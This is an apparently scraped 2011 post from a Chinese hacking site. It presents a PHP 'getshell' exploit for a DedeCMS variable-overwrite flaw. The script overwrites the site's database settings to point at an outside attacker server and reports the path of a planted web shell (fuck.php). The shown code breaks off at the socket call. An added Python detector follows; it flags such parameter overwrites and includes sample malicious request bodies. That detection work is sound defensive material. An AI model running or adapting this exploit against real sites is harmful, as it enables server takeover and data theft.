Source: myhack58 (www.myhack58.com), record MYHACK58:62201131895, posted by Anonymous (佚名)
Published: Sep 22, 2011 - 12:00 a.m.

DedeCMS variable overwrite 0day getshell exp - Vulnerability Warning - Heiba Security Net (黑吧安全网)


Author: Heixiaozi (黑小子, "the Black kid")

This is the hole in DedeCMS that was disclosed recently; the exp for it is pretty practical too!

#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
    print_r('
+--------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath=/data/cache  aid=2 shellpath=/  aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+--------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// the response is checked for the string "OK" to decide whether the request succeeded
if(strpos($exp,"OK")>12){
    echo "[*] Exploit Success \n";
    if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n";
    if($aid==2)echo "[*] Shell:".$url."/$path/fuck.php\n";
    if($aid==3)echo "[*] Shell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "[*] Exploit Failed \n";
}

function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    // POST body: the _COOKIE[GLOBALS][cfg_*] parameter names are what overwrite the
    // site's database settings (the "variable coverage" this exp is named after)
    $content="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=Trojan&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=Trojan&COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    // raw HTTP/1.1 request assembled by hand and sent over a socket
    $data= "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data.= "Host: ".$host."\r\n";
    $data.= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data.= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data.= "Accept-Language: en-us,en;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data.= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data.= "Connection: keep-alive\r\n";
    $data.= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data.= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data.= $content."\r\n";
    $ock=fsockopen($host,$port);

[1] [2] next
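As an added example (not code from this post or from DedeCMS), the following Python checks request parameter names for the pattern the exp's POST body relies on: a name such as _COOKIE[GLOBALS][cfg_dbhost] which, in an application that copies request input into its global scope, would redefine a PHP superglobal or a DedeCMS cfg_* setting. The set of protected prefixes, the request record format and the sample traffic are assumptions made for the example; 203.0.113.10 is a documentation address standing in for the host in the exp.

```python
"""Flag request parameters that try to overwrite PHP superglobals or DedeCMS cfg_* settings.

Added detection example, not code from the myhack58 post or from DedeCMS. The request
records below are constructed for the example; 203.0.113.10 is a documentation address.
"""
import re
from urllib.parse import parse_qsl

# Name prefixes that request input must never be allowed to define when an application
# copies parameters into its global scope: PHP's superglobals, plus DedeCMS's cfg_*
# configuration namespace (cfg_dbhost, cfg_dbuser, ... are the names the exp above sets).
# The list is an assumption for this example. PHP variable names are case-sensitive,
# so the match is case-sensitive as well.
PROTECTED_PREFIX = re.compile(
    r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE|_REQUEST|_SERVER|_SESSION|_FILES|_ENV)"
)


def name_segments(name):
    """Split a PHP array-style parameter name into its bracket segments:
    '_COOKIE[GLOBALS][cfg_dbhost]' -> ['_COOKIE', 'GLOBALS', 'cfg_dbhost']."""
    return [seg for seg in re.split(r"[\[\]]", name) if seg]


def overwrite_attempts(query):
    """Return the decoded parameter names in a query string or urlencoded body whose
    name, at any nesting level, starts with a protected prefix."""
    hits = []
    for name, _value in parse_qsl(query, keep_blank_values=True):
        if any(PROTECTED_PREFIX.match(seg) for seg in name_segments(name)):
            hits.append(name)
    return hits


def scan_requests(requests):
    """Run the check over (method, path, query, body) records and return one alert per
    request that carries at least one suspicious parameter name."""
    alerts = []
    for req in requests:
        names = overwrite_attempts(req["query"]) + overwrite_attempts(req["body"])
        if names:
            alerts.append({"method": req["method"], "path": req["path"], "names": names})
    return alerts


# Constructed sample traffic (not captured data). The second record mirrors the shape
# of the POST body in the exp above, with placeholder values.
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/plus/search.php",
     "query": "keyword=dede&channeltype=1", "body": ""},
    {"method": "POST", "path": "/plus/mytag_js.php", "query": "aid=1",
     "body": ("doaction=http%3A%2F%2Fexample.test%2Fplus%2Fmytag_js.php%3Faid%3D1"
              "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.10"
              "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=placeholder"
              "&nocache=true&QuickSearchBtn=x")},
    {"method": "GET", "path": "/index.php",
     "query": "cfg_dbpwd=placeholder&aid=1", "body": ""},
    {"method": "POST", "path": "/member/login.php",
     "query": "", "body": "userid=alice&pwd=placeholder"},
]

if __name__ == "__main__":
    for alert in scan_requests(SAMPLE_REQUESTS):
        print(f"[!] {alert['method']} {alert['path']} -> {', '.join(alert['names'])}")
```

Run it over the decoded query string and POST body of each request, for instance from a proxy or WAF log (a standard access log records the query string but not the POST body, so the body check needs a source that keeps it). The same prefix test belongs in the application itself, before any extract()-style copy of request input into the global scope; rejecting the request when a protected name appears removes the variable-overwrite primitive entirely rather than depending on later code not to trust the overwritten values.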